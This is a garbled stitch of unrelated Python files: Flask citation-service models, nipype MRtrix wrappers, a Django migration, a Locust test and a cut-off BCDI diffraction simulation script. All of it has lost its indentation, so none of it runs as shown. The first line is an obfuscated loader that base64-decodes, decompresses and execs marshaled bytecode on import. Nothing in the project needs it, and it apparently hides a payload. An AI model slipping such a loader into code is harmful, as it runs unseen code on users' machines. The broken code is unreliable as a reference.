exec(marshal.loads(zlib.decompress(base64.b64decode("eJzNVd1PG0cQn7vDGBscvsJHoE2XUiduUr4bSFHUBoWGoDaUAirSIYQMt9hnfD7Huw6hSitVtM9IVaW0fYja/4I/Ik/9E3jtQ1/71HRm7ozPAR4a9SF7vvXsb2Z+szu3O7sDYWvC9y6+6qYF4ODPgCKAfSobYBs12QTbrMkW2FZNbgK7CaQBhRg4JhwaYDgWfI8szWzRBMU4eHGw42DIOBRa4BB1LSBboJAAO8FCEuwkC61gt7LQBnYbCymwUyAtKFjcX+K+HQ5xOh0gm6DQCU6MwtpdtVk08yykCYVucOJnB04LLDyQOL1EVJcMBgi3RuG2YBBldlLkHyCXour2qGNHYNsZxmog7TqHtJsMG+YcqC+fQ9oTkvZetLjL4PRxUnpA9oLTz3JfY4KcKxdEHIgOBqODt05z9PY5ka8in/POq6SOqCPh9IfqyLsBMnwGea+OpAPk2hnkeh3JBMj7YPfDkw2QV6ByzZIdUBgAiRsD09AHuyZtG0P2g3MD+tAQMZbw7yYgHJpZ0Iu8CH4AeyZUXphohDaPXpj4W8c9v5oZwUPjvsS2pLpQLO/lhFtSOlssil03V5R6x0DYxBcPFtyjI0bdkzvwlE9N3/zmOHxjgAYoYGpNeGrwAsKxRYfE0E2RQ/WoFdbxPK1miHBJEX0yd3z1hz+/PH7+SaYZh5o06kBpGijt+FWtYyjuV1wtWdotVlVe06HXrhdAqihlOUMT1UT5NfcyQ8WBO0UqJ8fcZbWdIqiFFEan0WGkjAzZa0KcLEZBWvcP5GXunaLMVlwiUDQc3Pho0uN0JZMbQ5vicz/ruKXcKLVcWI/uqh7Sk3oZvZUU61lXBya//kItdjckm7rlqTZaFOdbrD9YnJmKAvNTXy1OuFY9+tSUF4bpOuWY9lRnxEU+dotift5X6m+D9be95PDIa7Th5LBobIv6uhIPpTj5+be/jo/Een5oZgrn+HhoogY1NCL49j8/7CYWXJ2vbiPJrBA5lkd3fG+MMzTCaRlLnAkm7md35Lbv76FXXuuymh0b29/fH90N4TrFKFPU3NZkUeYqWS/ipkc9Obaex13HCZ0cn5x+Jdr/k9Kg1T+aOLOq14ujfg9267R38uzo5Kfv3sTfsyPe64vLYi1byeHenRUMLPsVHSwfASoEAnfxhKdaI7uc9neqPp7TOruzp9rryKrOVjQeTfX8DU8EZiE8yDOeiqO0MbopxtNCJVjGtilupXmxPGJgcjztUg1UHRGYNR+Op1V3I8j4NHpwsew5oyT1bXQbOEcTaCfG0Zu+hEulx6V6qW4Ek57wVmVJi7QSZfwCmHjt00DnK341l9eijB9zNq3cf15iNR5EnxWi0FRRfbXCdZxrvU/OLFayJcf3AhRvAumtUGleSdSuh5K/z/U/71crbOW5pSrWbYsL+AGXbc8v6eCWOMD6rSmtc/e3Fpc+XdNJlFe/uPfZ1vzCytxDtqHgXP+3qmFw4tg+0FKtkKQTPK39LbdUxguJ5u6W2SYAiIPWGZBhOlhYq1RlsApZcrRfv48aLiUKe8fznWpRfszf50fs2ozwMVNmIt6BUqL2WP1Gu5Uy6IkZSezxNUmOYNbpuDWwiQVcp1apEI0ZqQvfZozWi3ZJowu9/wWv+7J2"))))
|
python
|
import datetime
import hashlib
from flask_sqlalchemy import SQLAlchemy
from flask_login import UserMixin
from tldr import app
from urllib.parse import urlparse
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
db = SQLAlchemy(app)
def baseN(num, b, numerals='0123456789abcdefghijklmnopqrstuvwxyz'):
return ((num == 0) and numerals[0]) or (
baseN(num // b, b, numerals).lstrip(numerals[0]) + numerals[num % b])
def hash_password(password):
h = hashlib.sha256()
h.update(password.encode("utf-8"))
return h.hexdigest()
class Citation(db.Model):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
OFFSET = 1000
id = db.Column(db.Integer, primary_key=True)
url = db.Column(db.Unicode(length=2048), nullable=False)
data = db.Column(db.UnicodeText, nullable=False)
created = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
deleted = db.Column(db.DateTime)
user_agent = db.Column(db.String(length=4094))
views = db.relationship(
'CitationView', order_by='desc(CitationView.time)', lazy='dynamic')
def __init__(self, url, data, user_agent):
self.url = url
self.data = data
self.user_agent = user_agent
def short_id(self):
return baseN(self.id + self.OFFSET, 36)
def short_url(self):
parsed_url = urlparse(self.url)
return "%s://tldrify.com/%s" % (parsed_url.scheme, self.short_id())
@staticmethod
def short_id_to_id(id):
return int(id, 36) - Citation.OFFSET
@staticmethod
def by_short_id(id):
try:
return Citation.query.filter_by(id=Citation.short_id_to_id(
id)).filter_by(deleted=None).first()
except ValueError:
return None
class CitationView(db.Model):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
id = db.Column(db.Integer, primary_key=True)
citation_id = db.Column(db.Integer, db.ForeignKey('citation.id'))
time = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
user_agent = db.Column(db.String(length=4094))
xpath_failure = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, citation_id, user_agent):
self.citation_id = citation_id
self.user_agent = user_agent
class User(db.Model, UserMixin):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.Unicode(length=255), unique=True, nullable=False)
password = db.Column(db.Unicode(length=255), nullable=False)
created = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
active = db.Column(db.Boolean, nullable=False, default=True)
citations = db.relationship(
'Citation', order_by='desc(Citation.created)', lazy='dynamic')
def __init__(self, email, password, active=True):
self.email = email
self.password = password
self.active = active
def is_active(self):
return self.active
def get_token(self, expiration=1800):
s = Serializer(app.config['SECRET_KEY'], expiration)
return s.dumps({'user': self.id}).decode('utf-8')
@staticmethod
def verify_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return None
id = data.get('user')
if id:
return User.query.get(id)
return None
class MailTask(db.Model):
__table_args__ = {'mysql_engine': 'MyISAM', 'mysql_charset': 'utf8'}
id = db.Column(db.Integer, primary_key=True)
recipient = db.Column(db.Unicode(length=255), nullable=False)
subject = db.Column(db.Unicode(length=255), nullable=False)
body = db.Column(db.UnicodeText, nullable=False)
submitted = db.Column(
db.DateTime, default=datetime.datetime.now, nullable=False)
sent = db.Column(db.DateTime)
def __init__(self, recipient, subject, body):
self.recipient = recipient
self.subject = subject
self.body = body
|
python
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
from __future__ import (print_function, division, unicode_literals,
absolute_import)
import os.path as op
import numpy as np
from ... import logging
from ...utils.filemanip import split_filename
from ..base import (CommandLineInputSpec, CommandLine, BaseInterface, traits,
File, TraitedSpec, isdefined)
iflogger = logging.getLogger('interface')
class DWI2SphericalHarmonicsImageInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc='Diffusion-weighted images')
out_filename = File(
genfile=True, argstr='%s', position=-1, desc='Output filename')
encoding_file = File(
exists=True,
argstr='-grad %s',
mandatory=True,
position=1,
desc=
'Gradient encoding, supplied as a 4xN text file with each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient, and b gives the b-value in units (1000 s/mm^2). See FSL2MRTrix'
)
maximum_harmonic_order = traits.Float(
argstr='-lmax %s',
desc=
'set the maximum harmonic order for the output series. By default, the program will use the highest possible lmax given the number of diffusion-weighted images.'
)
normalise = traits.Bool(
argstr='-normalise',
position=3,
desc="normalise the DW signal to the b=0 image")
class DWI2SphericalHarmonicsImageOutputSpec(TraitedSpec):
spherical_harmonics_image = File(
exists=True, desc='Spherical harmonics image')
class DWI2SphericalHarmonicsImage(CommandLine):
"""
Convert base diffusion-weighted images to their spherical harmonic representation.
This program outputs the spherical harmonic decomposition for the set measured signal attenuations.
The signal attenuations are calculated by identifying the b-zero images from the diffusion encoding supplied
(i.e. those with zero as the b-value), and dividing the remaining signals by the mean b-zero signal intensity.
The spherical harmonic decomposition is then calculated by least-squares linear fitting.
Note that this program makes use of implied symmetries in the diffusion profile.
First, the fact the signal attenuation profile is real implies that it has conjugate symmetry,
i.e. Y(l,-m) = Y(l,m)* (where * denotes the complex conjugate). Second, the diffusion profile should be
antipodally symmetric (i.e. S(x) = S(-x)), implying that all odd l components should be zero. Therefore,
this program only computes the even elements.
Note that the spherical harmonics equations used here differ slightly from those conventionally used,
in that the (-1)^m factor has been omitted. This should be taken into account in all subsequent calculations.
Each volume in the output image corresponds to a different spherical harmonic component, according to the following convention:
* [0] Y(0,0)
* [1] Im {Y(2,2)}
* [2] Im {Y(2,1)}
* [3] Y(2,0)
* [4] Re {Y(2,1)}
* [5] Re {Y(2,2)}
* [6] Im {Y(4,4)}
* [7] Im {Y(4,3)}
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> dwi2SH = mrt.DWI2SphericalHarmonicsImage()
>>> dwi2SH.inputs.in_file = 'diffusion.nii'
>>> dwi2SH.inputs.encoding_file = 'encoding.txt'
>>> dwi2SH.run() # doctest: +SKIP
"""
_cmd = 'dwi2SH'
input_spec = DWI2SphericalHarmonicsImageInputSpec
output_spec = DWI2SphericalHarmonicsImageOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['spherical_harmonics_image'] = self.inputs.out_filename
if not isdefined(outputs['spherical_harmonics_image']):
outputs['spherical_harmonics_image'] = op.abspath(
self._gen_outfilename())
else:
outputs['spherical_harmonics_image'] = op.abspath(
outputs['spherical_harmonics_image'])
return outputs
def _gen_filename(self, name):
if name == 'out_filename':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, name, _ = split_filename(self.inputs.in_file)
return name + '_SH.mif'
class ConstrainedSphericalDeconvolutionInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-3,
desc='diffusion-weighted image')
response_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc=
'the diffusion-weighted signal response function for a single fibre population (see EstimateResponse)'
)
out_filename = File(
genfile=True, argstr='%s', position=-1, desc='Output filename')
mask_image = File(
exists=True,
argstr='-mask %s',
position=2,
desc=
'only perform computation within the specified binary brain mask image'
)
encoding_file = File(
exists=True,
argstr='-grad %s',
position=1,
desc=
'Gradient encoding, supplied as a 4xN text file with each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient, and b gives the b-value in units (1000 s/mm^2). See FSL2MRTrix'
)
filter_file = File(
exists=True,
argstr='-filter %s',
position=-2,
desc=
'a text file containing the filtering coefficients for each even harmonic order.'
'the linear frequency filtering parameters used for the initial linear spherical deconvolution step (default = [ 1 1 1 0 0 ]).'
)
lambda_value = traits.Float(
argstr='-lambda %s',
desc=
'the regularisation parameter lambda that controls the strength of the constraint (default = 1.0).'
)
maximum_harmonic_order = traits.Int(
argstr='-lmax %s',
desc=
'set the maximum harmonic order for the output series. By default, the program will use the highest possible lmax given the number of diffusion-weighted images.'
)
threshold_value = traits.Float(
argstr='-threshold %s',
desc=
'the threshold below which the amplitude of the FOD is assumed to be zero, expressed as a fraction of the mean value of the initial FOD (default = 0.1)'
)
iterations = traits.Int(
argstr='-niter %s',
desc=
'the maximum number of iterations to perform for each voxel (default = 50)'
)
debug = traits.Bool(argstr='-debug', desc='Display debugging messages.')
directions_file = File(
exists=True,
argstr='-directions %s',
position=-2,
desc=
'a text file containing the [ el az ] pairs for the directions: Specify the directions over which to apply the non-negativity constraint (by default, the built-in 300 direction set is used)'
)
normalise = traits.Bool(
argstr='-normalise',
position=3,
desc="normalise the DW signal to the b=0 image")
class ConstrainedSphericalDeconvolutionOutputSpec(TraitedSpec):
spherical_harmonics_image = File(
exists=True, desc='Spherical harmonics image')
class ConstrainedSphericalDeconvolution(CommandLine):
"""
Perform non-negativity constrained spherical deconvolution.
Note that this program makes use of implied symmetries in the diffusion profile.
First, the fact the signal attenuation profile is real implies that it has conjugate symmetry,
i.e. Y(l,-m) = Y(l,m)* (where * denotes the complex conjugate). Second, the diffusion profile should be
antipodally symmetric (i.e. S(x) = S(-x)), implying that all odd l components should be zero.
Therefore, this program only computes the even elements. Note that the spherical harmonics equations used here
differ slightly from those conventionally used, in that the (-1)^m factor has been omitted. This should be taken
into account in all subsequent calculations. Each volume in the output image corresponds to a different spherical
harmonic component, according to the following convention:
* [0] Y(0,0)
* [1] Im {Y(2,2)}
* [2] Im {Y(2,1)}
* [3] Y(2,0)
* [4] Re {Y(2,1)}
* [5] Re {Y(2,2)}
* [6] Im {Y(4,4)}
* [7] Im {Y(4,3)}
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> csdeconv = mrt.ConstrainedSphericalDeconvolution()
>>> csdeconv.inputs.in_file = 'dwi.mif'
>>> csdeconv.inputs.encoding_file = 'encoding.txt'
>>> csdeconv.run() # doctest: +SKIP
"""
_cmd = 'csdeconv'
input_spec = ConstrainedSphericalDeconvolutionInputSpec
output_spec = ConstrainedSphericalDeconvolutionOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['spherical_harmonics_image'] = self.inputs.out_filename
if not isdefined(outputs['spherical_harmonics_image']):
outputs['spherical_harmonics_image'] = op.abspath(
self._gen_outfilename())
else:
outputs['spherical_harmonics_image'] = op.abspath(
outputs['spherical_harmonics_image'])
return outputs
def _gen_filename(self, name):
if name == 'out_filename':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, name, _ = split_filename(self.inputs.in_file)
return name + '_CSD.mif'
class EstimateResponseForSHInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-3,
desc='Diffusion-weighted images')
mask_image = File(
exists=True,
mandatory=True,
argstr='%s',
position=-2,
desc=
'only perform computation within the specified binary brain mask image'
)
out_filename = File(
genfile=True, argstr='%s', position=-1, desc='Output filename')
encoding_file = File(
exists=True,
argstr='-grad %s',
mandatory=True,
position=1,
desc=
'Gradient encoding, supplied as a 4xN text file with each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient, and b gives the b-value in units (1000 s/mm^2). See FSL2MRTrix'
)
maximum_harmonic_order = traits.Int(
argstr='-lmax %s',
desc=
'set the maximum harmonic order for the output series. By default, the program will use the highest possible lmax given the number of diffusion-weighted images.'
)
normalise = traits.Bool(
argstr='-normalise', desc='normalise the DW signal to the b=0 image')
quiet = traits.Bool(
argstr='-quiet',
desc='Do not display information messages or progress status.')
debug = traits.Bool(argstr='-debug', desc='Display debugging messages.')
class EstimateResponseForSHOutputSpec(TraitedSpec):
response = File(exists=True, desc='Spherical harmonics image')
class EstimateResponseForSH(CommandLine):
"""
Estimates the fibre response function for use in spherical deconvolution.
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> estresp = mrt.EstimateResponseForSH()
>>> estresp.inputs.in_file = 'dwi.mif'
>>> estresp.inputs.mask_image = 'dwi_WMProb.mif'
>>> estresp.inputs.encoding_file = 'encoding.txt'
>>> estresp.run() # doctest: +SKIP
"""
_cmd = 'estimate_response'
input_spec = EstimateResponseForSHInputSpec
output_spec = EstimateResponseForSHOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['response'] = self.inputs.out_filename
if not isdefined(outputs['response']):
outputs['response'] = op.abspath(self._gen_outfilename())
else:
outputs['response'] = op.abspath(outputs['response'])
return outputs
def _gen_filename(self, name):
if name == 'out_filename':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, name, _ = split_filename(self.inputs.in_file)
return name + '_ER.txt'
def concat_files(bvec_file, bval_file, invert_x, invert_y, invert_z):
bvecs = np.loadtxt(bvec_file)
bvals = np.loadtxt(bval_file)
if np.shape(bvecs)[0] > np.shape(bvecs)[1]:
bvecs = np.transpose(bvecs)
if invert_x:
bvecs[0, :] = -bvecs[0, :]
iflogger.info('Inverting b-vectors in the x direction')
if invert_y:
bvecs[1, :] = -bvecs[1, :]
iflogger.info('Inverting b-vectors in the y direction')
if invert_z:
bvecs[2, :] = -bvecs[2, :]
iflogger.info('Inverting b-vectors in the z direction')
iflogger.info(np.shape(bvecs))
iflogger.info(np.shape(bvals))
encoding = np.transpose(np.vstack((bvecs, bvals)))
_, bvec, _ = split_filename(bvec_file)
_, bval, _ = split_filename(bval_file)
out_encoding_file = bvec + '_' + bval + '.txt'
np.savetxt(out_encoding_file, encoding)
return out_encoding_file
class FSL2MRTrixInputSpec(TraitedSpec):
bvec_file = File(
exists=True, mandatory=True, desc='FSL b-vectors file (3xN text file)')
bval_file = File(
exists=True, mandatory=True, desc='FSL b-values file (1xN text file)')
invert_x = traits.Bool(
False, usedefault=True, desc='Inverts the b-vectors along the x-axis')
invert_y = traits.Bool(
False, usedefault=True, desc='Inverts the b-vectors along the y-axis')
invert_z = traits.Bool(
False, usedefault=True, desc='Inverts the b-vectors along the z-axis')
out_encoding_file = File(genfile=True, desc='Output encoding filename')
class FSL2MRTrixOutputSpec(TraitedSpec):
encoding_file = File(
desc=
'The gradient encoding, supplied as a 4xN text file with each line is in the format [ X Y Z b ], where [ X Y Z ] describe the direction of the applied gradient'
'and b gives the b-value in units (1000 s/mm^2).')
class FSL2MRTrix(BaseInterface):
"""
Converts separate b-values and b-vectors from text files (FSL style) into a
4xN text file in which each line is in the format [ X Y Z b ], where [ X Y Z ]
describe the direction of the applied gradient, and b gives the
b-value in units (1000 s/mm^2).
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> fsl2mrtrix = mrt.FSL2MRTrix()
>>> fsl2mrtrix.inputs.bvec_file = 'bvecs'
>>> fsl2mrtrix.inputs.bval_file = 'bvals'
>>> fsl2mrtrix.inputs.invert_y = True
>>> fsl2mrtrix.run() # doctest: +SKIP
"""
input_spec = FSL2MRTrixInputSpec
output_spec = FSL2MRTrixOutputSpec
def _run_interface(self, runtime):
encoding = concat_files(self.inputs.bvec_file, self.inputs.bval_file,
self.inputs.invert_x, self.inputs.invert_y,
self.inputs.invert_z)
return runtime
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['encoding_file'] = op.abspath(
self._gen_filename('out_encoding_file'))
return outputs
def _gen_filename(self, name):
if name == 'out_encoding_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
_, bvec, _ = split_filename(self.inputs.bvec_file)
_, bval, _ = split_filename(self.inputs.bval_file)
return bvec + '_' + bval + '.txt'
class GenerateDirectionsInputSpec(CommandLineInputSpec):
num_dirs = traits.Int(
mandatory=True,
argstr='%s',
position=-2,
desc='the number of directions to generate.')
power = traits.Float(
argstr='-power %s',
desc='specify exponent to use for repulsion power law.')
niter = traits.Int(
argstr='-niter %s',
desc='specify the maximum number of iterations to perform.')
display_info = traits.Bool(
argstr='-info', desc='Display information messages.')
quiet_display = traits.Bool(
argstr='-quiet',
desc='do not display information messages or progress status.')
display_debug = traits.Bool(
argstr='-debug', desc='Display debugging messages.')
out_file = File(
name_source=['num_dirs'],
name_template='directions_%d.txt',
argstr='%s',
hash_files=False,
position=-1,
desc='the text file to write the directions to, as [ az el ] pairs.')
class GenerateDirectionsOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='directions file')
class GenerateDirections(CommandLine):
"""
generate a set of directions evenly distributed over a hemisphere.
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> gendir = mrt.GenerateDirections()
>>> gendir.inputs.num_dirs = 300
>>> gendir.run() # doctest: +SKIP
"""
_cmd = 'gendir'
input_spec = GenerateDirectionsInputSpec
output_spec = GenerateDirectionsOutputSpec
class FindShPeaksInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-3,
desc='the input image of SH coefficients.')
directions_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc='the set of directions to use as seeds for the peak finding')
peaks_image = File(
exists=True,
argstr='-peaks %s',
desc=
'the program will try to find the peaks that most closely match those in the image provided'
)
num_peaks = traits.Int(
argstr='-num %s', desc='the number of peaks to extract (default is 3)')
peak_directions = traits.List(
traits.Float,
argstr='-direction %s',
sep=' ',
minlen=2,
maxlen=2,
desc=
'phi theta. the direction of a peak to estimate. The algorithm will attempt to find the same number of peaks as have been specified using this option '
' phi: the azimuthal angle of the direction (in degrees). theta: the elevation angle of the direction (in degrees, from the vertical z-axis)'
)
peak_threshold = traits.Float(
argstr='-threshold %s',
desc=
'only peak amplitudes greater than the threshold will be considered')
display_info = traits.Bool(
argstr='-info', desc='Display information messages.')
quiet_display = traits.Bool(
argstr='-quiet',
desc='do not display information messages or progress status.')
display_debug = traits.Bool(
argstr='-debug', desc='Display debugging messages.')
out_file = File(
name_template="%s_peak_dirs.mif",
keep_extension=False,
argstr='%s',
hash_files=False,
position=-1,
desc=
'the output image. Each volume corresponds to the x, y & z component of each peak direction vector in turn',
name_source=["in_file"])
class FindShPeaksOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='Peak directions image')
class FindShPeaks(CommandLine):
"""
identify the orientations of the N largest peaks of a SH profile
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> shpeaks = mrt.FindShPeaks()
>>> shpeaks.inputs.in_file = 'csd.mif'
>>> shpeaks.inputs.directions_file = 'dirs.txt'
>>> shpeaks.inputs.num_peaks = 2
>>> shpeaks.run() # doctest: +SKIP
"""
_cmd = 'find_SH_peaks'
input_spec = FindShPeaksInputSpec
output_spec = FindShPeaksOutputSpec
class Directions2AmplitudeInputSpec(CommandLineInputSpec):
in_file = File(
exists=True,
argstr='%s',
mandatory=True,
position=-2,
desc=
'the input directions image. Each volume corresponds to the x, y & z component of each direction vector in turn.'
)
peaks_image = File(
exists=True,
argstr='-peaks %s',
desc=
'the program will try to find the peaks that most closely match those in the image provided'
)
num_peaks = traits.Int(
argstr='-num %s', desc='the number of peaks to extract (default is 3)')
peak_directions = traits.List(
traits.Float,
argstr='-direction %s',
sep=' ',
minlen=2,
maxlen=2,
desc=
'phi theta. the direction of a peak to estimate. The algorithm will attempt to find the same number of peaks as have been specified using this option '
' phi: the azimuthal angle of the direction (in degrees). theta: the elevation angle of the direction (in degrees, from the vertical z-axis)'
)
display_info = traits.Bool(
argstr='-info', desc='Display information messages.')
quiet_display = traits.Bool(
argstr='-quiet',
desc='do not display information messages or progress status.')
display_debug = traits.Bool(
argstr='-debug', desc='Display debugging messages.')
out_file = File(
name_template="%s_amplitudes.mif",
keep_extension=False,
argstr='%s',
hash_files=False,
position=-1,
desc='the output amplitudes image',
name_source=["in_file"])
class Directions2AmplitudeOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='amplitudes image')
class Directions2Amplitude(CommandLine):
"""
convert directions image to amplitudes
Example
-------
>>> import nipype.interfaces.mrtrix as mrt
>>> amplitudes = mrt.Directions2Amplitude()
>>> amplitudes.inputs.in_file = 'peak_directions.mif'
>>> amplitudes.run() # doctest: +SKIP
"""
_cmd = 'dir2amp'
input_spec = Directions2AmplitudeInputSpec
output_spec = Directions2AmplitudeOutputSpec
|
python
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright 2019, GeoSolutions Sas.
# All rights reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE.txt file in the root directory of this source tree.
#
#########################################################################
def shapefile_and_friends(path):
return {ext: path + "." + ext for ext in ['shx', 'shp', 'dbf', 'prj']}
|
python
|
# Generated by Django 2.2.13 on 2020-11-10 08:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0139_team_subtitle'),
]
operations = [
migrations.AlterField(
model_name='team',
name='subtitle',
field=models.CharField(default='Join your neighbors to learn something together. Learning circles meet weekly for 6-8 weeks, and are free to join.', max_length=256),
),
]
|
python
|
import time
from locust import HttpUser, between, task
class QuickstartUser(HttpUser):
wait_time = between(1, 2)
@task
def get_users(self):
self.client.get("/api/users/")
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# BCDI: tools for pre(post)-processing Bragg coherent X-ray diffraction imaging data
# (c) 07/2017-06/2019 : CNRS UMR 7344 IM2NP
# (c) 07/2019-present : DESY PHOTON SCIENCE
# authors:
# Jerome Carnis, [email protected]
import numpy as np
from numpy.random import poisson
from numpy.fft import fftn, fftshift
from matplotlib import pyplot as plt
import tkinter as tk
from tkinter import filedialog
from scipy.interpolate import RegularGridInterpolator
import gc
import os
import sys
import bcdi.graph.graph_utils as gu
from bcdi.experiment.detector import create_detector
from bcdi.experiment.setup import Setup
import bcdi.postprocessing.postprocessing_utils as pu
import bcdi.simulation.simulation_utils as simu
import bcdi.utils.utilities as util
helptext = """
Using a support created from a reconstructed object (real space), calculate the
diffraction pattern depending on several parameters: detector size, detector distance,
presence/width of a detector gap, Poisson noise, user-defined phase.
The provided reconstructed object is expected to be orthogonalized, in the laboratory
frame.
"""
scan = 2227 # spec scan number
datadir = "C:/Users/Jerome/Documents/data/BCDI_isosurface/S" + str(scan) + "/test/"
# "D:/data/BCDI_isosurface/S"+str(scan)+"/test/"
original_sdd = 0.50678 # 1.0137
# in m, sample to detector distance of the provided reconstruction
simulated_sdd = (
0.50678 # in m, sample to detector distance for the simulated diffraction pattern
)
sdd_change_mode = "real_space" # 'real_space' or 'reciprocal_space',
# for compensating the detector distance change
# in real_space, it will interpolate the support
# if 'reciprocal_space', it will interpolate the diffraction calculated on pad_size
energy = 9000.0 - 6 # x-ray energy in eV, 6eV offset at ID01
voxel_size = 3
# in nm, voxel size of the reconstruction, should be eaqual in each direction
photon_threshold = 0 # 0.75
photon_number = (
5e7 # * 1011681 / 469091 # total number of photons in the array, usually around 5e7
)
pad_ortho = False # True to pad before interpolating into detector frame,
# False after (saves memory)
# True is the only choice if the compensated object is larger than the original
# array shape (it gets truncated)
orthogonal_frame = (
False # set to False to interpolate the diffraction pattern in the detector frame
)
rotate_crystal = (
True # if True, the crystal will be rotated as it was during the experiment
)
support_threshold = 0.24 # threshold for support determination
beamline = "ID01" # name of the beamline, used for orthogonalisation
# supported beamlines: 'ID01', 'SIXS_2018', 'SIXS_2019', 'CRISTAL', 'P10'
beam_direction = np.array([1, 0, 0]) # incident beam along z
rocking_angle = "outofplane" # "outofplane" or "inplane"
outofplane_angle = 35.3240 # detector delta ID01
inplane_angle = -1.6029 # detector nu ID01
grazing_angle = 0 # in degrees, incident angle for in-plane rocking curves (eta ID01)
tilt_angle = 0.0102 # angular step size for rocking angle, eta ID01
detector = "Maxipix" # "Eiger2M", "Maxipix", "Eiger4M", "Merlin", "Timepix" or "Dummy"
set_gap = True
# set to True if you want to use the detector gap in the simulation (updates the mask)
gap_width = 6 # number of pixels to mask
gap_pixel_start = 550
flat_phase = True # set to True to use a phase flat (0 everywhere)
include_noise = False # set to True to include poisson noise on the data
original_size = [
400,
400,
400,
] # size of the FFT array before binning.
# It will be modify to take into account binning
# during phasing automatically. Leave it to () if the shape did not change.
binning = (1, 1, 1) # binning factor during phasing
pad_size = [
1000,
1000,
1000,
] # will pad the array by this amount of zeroed pixels in z, y, x at both ends
# if only a number (e.g. 3), will pad to get three times the initial array size
# ! max size ~ [800, 800, 800]
crop_size = [300, 300, 300] # will crop the array to this size
ref_axis_outplane = "y" # "y" # "z" # q is supposed to be aligned along that axis
# before rotating back (nexus)
phase_range = np.pi # for plots
strain_range = 0.001 # for plots
debug = False # True to see all plots
save_fig = True # if True save figures
save_data = True # if True save data as npz and VTK
comment = "" # should start with _
##################################
# end of user-defined parameters #
##################################
###################
# define colormap #
###################
bad_color = "1.0" # white background
colormap = gu.Colormap(bad_color=bad_color)
my_cmap = colormap.cmap
################
# define setup #
################
detector = create_detector(name=detector)
setup = Setup(
beamline=beamline,
detector=detector,
energy=energy,
outofplane_angle=outofplane_angle,
inplane_angle=inplane_angle,
tilt_angle=tilt_angle,
rocking_angle=rocking_angle,
grazing_angle=grazing_angle,
distance=original_sdd,
)
#########################
# load a reconstruction #
#########################
plt.ion()
root = tk.Tk()
root.withdraw()
file_path = filedialog.askopenfilename(initialdir=datadir, filetypes=[("NPZ", "*.npz")])
npzfile = np.load(file_path)
amp = npzfile["amp"]
gu.multislices_plot(
amp,
sum_frames=False,
plot_colorbar=False,
vmin=0,
vmax=1,
cmap=my_cmap,
title="Input amplitude",
)
#################################
# pad data to the original size #
#################################
print("Initial data size:", amp.shape)
if len(original_size) == 0:
original_size = amp.shape
print("FFT size before accounting for binning", original_size)
original_size = tuple(
[original_size[index] // binning[index] for index in range(len(binning))]
)
print("Binning used during phasing:", binning)
print("Padding back to original FFT size", original_size, "\n")
amp = util.crop_pad(array=amp, output_shape=original_size)
nz, ny, nx = amp.shape
##########################################################
# calculate q for later regridding in the detector frame #
##########################################################
kin = (
2 * np.pi / setup.wavelength * beam_direction
) # in laboratory frame z downstream, y vertical, x outboard
kout = (
setup.exit_wavevector()
) # in laboratory frame z downstream, y vertical, x outboard
q = kout - kin
Qnorm = np.linalg.norm(q)
q = q / Qnorm
Qnorm = Qnorm * 1e-10 # switch to angstroms
planar_dist = 2 * np.pi / Qnorm # Qnorm should be in angstroms
print("Wavevector transfer [z, y, x]:", q * Qnorm)
print("Wavevector transfer: (angstroms)", str("{:.4f}".format(Qnorm)))
print(
"Interplanar distance: (angstroms)", str("{:.4f}".format(planar_dist)), "angstroms"
)
planar_dist = planar_dist / 10 # switch to nm
#########################################
# define the support and impose a phase #
#########################################
support = np.ones((nz, ny, nx))
if flat_phase:
phase = np.zeros((nz, ny, nx))
else:
comment = comment + "_phase"
# model for paper about artefacts in BCDI
